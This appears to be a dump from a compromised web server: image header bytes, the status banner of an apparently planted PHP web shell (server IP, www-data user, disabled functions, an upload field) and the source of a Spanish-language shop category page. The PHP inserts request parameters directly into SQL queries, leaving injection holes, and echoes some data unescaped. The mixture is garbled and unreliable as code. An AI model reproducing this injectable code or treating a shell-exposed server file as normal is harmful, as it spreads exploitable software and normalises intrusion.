����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 18.217.140.32 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/ |
Upload File : |
<?php session_start(); error_reporting(0); include('includes/config.php'); $find="%{$_POST['product']}%"; if(isset($_GET['action']) && $_GET['action']=="add"){ $id=intval($_GET['id']); if(isset($_SESSION['cart'][$id])){ $_SESSION['cart'][$id]['quantity']++; }else{ $sql_p="SELECT * FROM products WHERE id={$id}"; $query_p=mysqli_query($con,$sql_p); if(mysqli_num_rows($query_p)!=0){ $row_p=mysqli_fetch_array($query_p); $_SESSION['cart'][$row_p['id']]=array("quantity" => 1, "price" => $row_p['productPrice']); header('location:my-cart.php'); }else{ $message="Product ID is invalid"; } } } // COde for Wishlist if(isset($_GET['pid']) && $_GET['action']=="wishlist" ){ if(strlen($_SESSION['login'])==0) { header('location:login.php'); } else { mysqli_query($con,"insert into wishlist(userId,productId) values('".$_SESSION['id']."','".$_GET['pid']."')"); echo "<script>alert('Product aaded in wishlist');</script>"; header('location:my-wishlist.php'); } } ?> <!DOCTYPE html> <html lang="es"> <head> <!-- Meta --> <meta charset="utf-8"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"> <meta name="description" content=""> <meta name="author" content=""> <meta name="keywords" content="MediaCenter, Template, eCommerce"> <meta name="robots" content="all"> <title>Categorias</title> <!-- Bootstrap Core CSS --> <link rel="stylesheet" href="assets/css/bootstrap.min.css"> <!-- Customizable CSS --> <link rel="stylesheet" href="assets/css/main.css"> <link rel="stylesheet" href="assets/css/green.css"> <link rel="stylesheet" href="assets/css/owl.carousel.css"> <link rel="stylesheet" href="assets/css/owl.transitions.css"> <!--<link rel="stylesheet" href="assets/css/owl.theme.css">--> <link href="assets/css/lightbox.css" rel="stylesheet"> <link rel="stylesheet" href="assets/css/animate.min.css"> <link rel="stylesheet" href="assets/css/rateit.css"> <link rel="stylesheet" href="assets/css/bootstrap-select.min.css"> <!-- Demo Purpose Only. Should be removed in production --> <link rel="stylesheet" href="assets/css/config.css"> <link href="assets/css/green.css" rel="alternate stylesheet" title="Green color"> <link href="assets/css/blue.css" rel="alternate stylesheet" title="Blue color"> <link href="assets/css/red.css" rel="alternate stylesheet" title="Red color"> <link href="assets/css/orange.css" rel="alternate stylesheet" title="Orange color"> <link href="assets/css/dark-green.css" rel="alternate stylesheet" title="Darkgreen color"> <!-- Demo Purpose Only. Should be removed in production : END --> <!-- Icons/Glyphs --> <link rel="stylesheet" href="assets/css/font-awesome.min.css"> <!-- Fonts --> <link href='http://fonts.googleapis.com/css?family=Roboto:300,400,500,700' rel='stylesheet' type='text/css'> <!-- Favicon --> <link rel="shortcut icon" href="assets/images/favicon.ico"> <!-- HTML5 elements and media queries Support for IE8 : HTML5 shim and Respond.js --> <!--[if lt IE 9]> <script src="assets/js/html5shiv.js"></script> <script src="assets/js/respond.min.js"></script> <![endif]--> </head> <body class="cnt-home"> <header class="header-style-1"> <!-- ============================================== TOP MENU ============================================== --> <?php include('includes/top-header.php');?> <!-- ============================================== TOP MENU : END ============================================== --> <?php include('includes/main-header.php');?> <!-- ============================================== NAVBAR ============================================== --> <?php include('includes/menu-bar.php');?> <!-- ============================================== NAVBAR : END ============================================== --> </header> <!-- ============================================== HEADER : END ============================================== --> </div><!-- /.breadcrumb --> <div class="body-content outer-top-xs"> <div class='container'> <div class='row outer-bottom-sm'> <div class="ocultar-div"> <div class='col-md-3 sidebar'> <!-- ================================== TOP NAVIGATION ================================== --> <!-- ================================== TOP NAVIGATION : END ================================== --> <div class="sidebar-module-container"> <h3 class="section-title">comprar por</h3> <div class="sidebar-filter"> <!-- ============================================== SIDEBAR CATEGORY ============================================== --> <div class="sidebar-widget wow fadeInUp outer-bottom-xs "> <div class="widget-header m-t-20"> <h4 class="widget-title">Categoria</h4> </div> <div class="sidebar-widget-body m-t-10"> <?php $sql=mysqli_query($con,"select id,categoryName from category"); while($row=mysqli_fetch_array($sql)) { ?> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a href="category.php?cid=<?php echo $row['id'];?>" class="accordion-toggle collapsed"> <?php echo $row['categoryName'];?> </a> </div> </div> </div> <?php } ?> </div><!-- /.sidebar-widget-body --> </div><!-- /.sidebar-widget --> <!-- ============================================== COLOR: END ============================================== --> </div><!-- /.sidebar-filter --> </div><!-- /.sidebar-module-container --> </div><!-- /.sidebar --> </div> <div class='col-md-9'> <!-- ========================================== SECTION – HERO ========================================= --> <div class="search-result-container"> <div id="myTabContent" class="tab-content"> <div class="tab-pane active " id="grid-container"> <div class="category-product inner-top-vs"> <div class="row"> <?php $ret=mysqli_query($con,"select * from products where productName like '$find'"); $num=mysqli_num_rows($ret); if($num>0) { while ($row=mysqli_fetch_array($ret)) {?> <div class="col-sm-6 col-md-4 wow fadeInUp"> <div class="products"> <div class="product"> <div class="product-image"> <div class="image"> <a href="product-details.php?pid=<?php echo htmlentities($row['id']);?>"><img src="assets/images/blank.gif" data-echo="admin/productimages/<?php echo htmlentities($row['id']);?>/<?php echo htmlentities($row['productImage1']);?>" alt="" width="200" height="300"></a> </div><!-- /.image --> </div><!-- /.product-image --> <div class="product-info text-left"> <h3 class="name"><a href="product-details.php?pid=<?php echo htmlentities($row['id']);?>"><?php echo htmlentities($row['productName']);?></a></h3> <div class="rating rateit-small"></div> <div class="description"></div> <div class="product-price"> <span class="price"> $. <?php echo htmlentities($row['productPrice']);?> </span> <span class="price-before-discount">$.<?php echo htmlentities($row['productPriceBeforeDiscount']);?></span> </div><!-- /.product-price --> </div><!-- /.product-info --> <div class="cart clearfix animate-effect"> <div class="action"> <ul class="list-unstyled"> <li class="add-cart-button btn-group"> <button class="btn btn-primary icon" data-toggle="dropdown" type="button"> <i class="fa fa-shopping-cart"></i> </button> <a href="category.php?page=product&action=add&id=<?php echo $row['id']; ?>"> <button class="btn btn-primary" type="button">Agregar a carrito</button></a> </li> <li class="lnk wishlist"> <a class="add-to-cart" href="category.php?pid=<?php echo htmlentities($row['id'])?>&&action=wishlist" title="Wishlist"> <i class="icon fa fa-heart"></i> </a> </li> </ul> </div><!-- /.action --> </div><!-- /.cart --> </div> </div> </div> <?php } } else {?> <div class="col-sm-6 col-md-4 wow fadeInUp"> <h3>No se encontraron productos</h3> </div> <?php } ?> </div><!-- /.row --> </div><!-- /.category-product --> </div><!-- /.tab-pane --> </div><!-- /.search-result-container --> </div><!-- /.col --> </div> </div> <?php include('includes/brands-slider.php');?> </div> </div> <?php include('includes/footer.php');?> <script src="assets/js/jquery-1.11.1.min.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/bootstrap-hover-dropdown.min.js"></script> <script src="assets/js/owl.carousel.min.js"></script> <script src="assets/js/echo.min.js"></script> <script src="assets/js/jquery.easing-1.3.min.js"></script> <script src="assets/js/bootstrap-slider.min.js"></script> <script src="assets/js/jquery.rateit.min.js"></script> <script type="text/javascript" src="assets/js/lightbox.min.js"></script> <script src="assets/js/bootstrap-select.min.js"></script> <script src="assets/js/wow.min.js"></script> <script src="assets/js/scripts.js"></script> <!-- For demo purposes – can be removed on production --> <script src="switchstylesheet/switchstylesheet.js"></script> <script> $(document).ready(function(){ $(".changecolor").switchstylesheet( { seperator:"color"} ); $('.show-theme-options').click(function(){ $(this).parent().toggleClass('open'); return false; }); }); $(window).bind("load", function() { $('.show-theme-options').delay(2000).trigger('click'); }); </script> <!-- For demo purposes – can be removed on production : End --> </body> </html>